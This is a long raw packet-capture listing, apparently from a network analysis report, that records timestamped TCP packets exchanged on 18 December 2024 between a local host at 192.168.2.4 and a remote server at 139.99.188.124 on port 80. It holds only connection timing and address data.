                                                          Dec 18, 2024 09:32:35.623707056 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.624639034 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.624742985 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.624809980 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.625782013 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.625940084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.625996113 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.627190113 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.627374887 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.627430916 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.628319025 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.628400087 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.628453970 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.629514933 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.629616022 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.629672050 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.630568981 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.630660057 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.630719900 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.631479025 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.631511927 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.631562948 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.632251978 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.632409096 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.632460117 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.633338928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.633466005 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.633519888 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.634377003 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.634428978 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.634484053 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.635406017 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.635430098 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.635499954 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.640218019 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.640242100 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.640302896 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.640487909 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.640636921 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.640691996 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.641591072 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.641647100 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.641709089 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.642580986 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.642699003 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.642761946 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.643661976 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.643785954 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.643846989 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.644673109 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.644752979 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.644815922 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.645684004 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.645837069 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.645893097 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.646742105 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.646845102 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.646900892 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.647780895 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.647891998 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.647954941 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.648804903 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.648894072 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.648948908 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.649858952 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.649996996 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.650058985 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.650896072 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.651005983 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.651068926 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.651935101 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.652031898 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.652093887 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.652954102 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.653080940 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.653161049 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.654303074 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.654505014 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.654572964 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.655448914 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.655541897 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.655651093 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.656173944 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.656261921 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.656322002 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.657175064 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.657284975 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.657346010 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.658173084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.658282995 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.658339977 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.659213066 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.659318924 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.659380913 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.660270929 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.660408974 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.660468102 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.661339045 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.661492109 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.661571980 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.662410975 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.662472963 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.662537098 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.663376093 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.663463116 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.663537979 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.664377928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.664484978 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.664604902 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.665417910 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.665551901 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.665637016 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.666485071 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.666554928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.666677952 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.667524099 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.667675972 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.667830944 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.668586969 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.668742895 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.668809891 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.669578075 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.669692993 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.669749022 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.670656919 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.670789957 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.670851946 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.671813965 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.671916962 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.672013044 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.672760010 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.672846079 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.672966003 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.673871994 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.673968077 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.674129963 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.674915075 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.674940109 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.675000906 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.676038027 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.676059961 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.676125050 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.676861048 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.677072048 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.677133083 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.677926064 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.678066015 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.678139925 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.679028034 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.679194927 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.679253101 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.679970980 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.719185114 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.811985016 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.812069893 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.812252045 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.812376976 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.812472105 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.812534094 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.813329935 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.813393116 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.813453913 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.814287901 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.814356089 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.814413071 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.815308094 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.815470934 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.815542936 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.816359043 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.816462040 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.816517115 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.817440987 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.817519903 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.817574978 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.818440914 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.818492889 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.818548918 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.819506884 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.819607973 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.819665909 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.820538998 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.820626020 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.820684910 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.821551085 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.821647882 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.821703911 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.822731018 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.822890043 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.822947025 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.823693991 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.823822021 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.823884010 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.824659109 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.824783087 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.824837923 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.825798988 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.825922012 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.825977087 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.826726913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.826862097 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.826917887 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.827809095 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.827891111 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.827944040 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.831593037 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.831743002 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.831804991 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.832149982 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.832204103 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.832261086 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.833190918 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.833277941 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.833333015 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.834208965 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.834362030 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.834424973 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.835268021 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.835349083 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.835405111 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.836427927 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.836544991 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.836596966 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.837562084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.837666988 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.837723017 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.838454962 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.838577032 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.838632107 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.839471102 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.839554071 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.839623928 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.840629101 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.840730906 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.840781927 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.841480017 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.841633081 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.841685057 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.842550039 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.842628956 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.843255997 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.843542099 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.843674898 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.843730927 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.844630957 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.844728947 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.844785929 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.845642090 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.845751047 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.845809937 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.846688986 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.846771002 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.846824884 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.847727060 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.847850084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.847902060 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.848747015 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.848870993 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.848929882 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.849781990 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.849890947 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.849946022 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.850842953 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.850965977 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.851023912 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.851897001 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.852016926 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.852081060 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.853015900 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.853137016 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.853193998 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.854029894 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.854079008 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.854146957 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.854999065 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.855094910 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.855155945 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.856029034 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.856240988 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.856304884 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.857094049 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.857213020 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.857271910 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.858074903 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.858259916 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.858313084 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.859158993 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.859241962 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.859302044 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.860186100 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.860341072 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.860395908 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.861252069 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.861275911 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.861330986 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.862268925 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.862387896 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.862464905 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.863270044 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.863396883 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.863460064 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.864321947 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.864428997 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.864497900 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.865607023 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.865703106 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.865756035 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.866414070 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.866543055 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.866600990 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.867456913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.867579937 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.867635965 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.868464947 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.922369957 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.003171921 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.003318071 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.003387928 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.003576040 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.003701925 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.003851891 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.004625082 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.004756927 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.004816055 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.005651951 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.005770922 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.005817890 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.006697893 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.006815910 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.006863117 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.007741928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.007823944 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.007882118 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.008831978 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.008954048 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.009010077 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.009850979 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.009928942 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.009978056 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.010888100 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.010996103 CET8049730139.99.188.124192.168.2.4
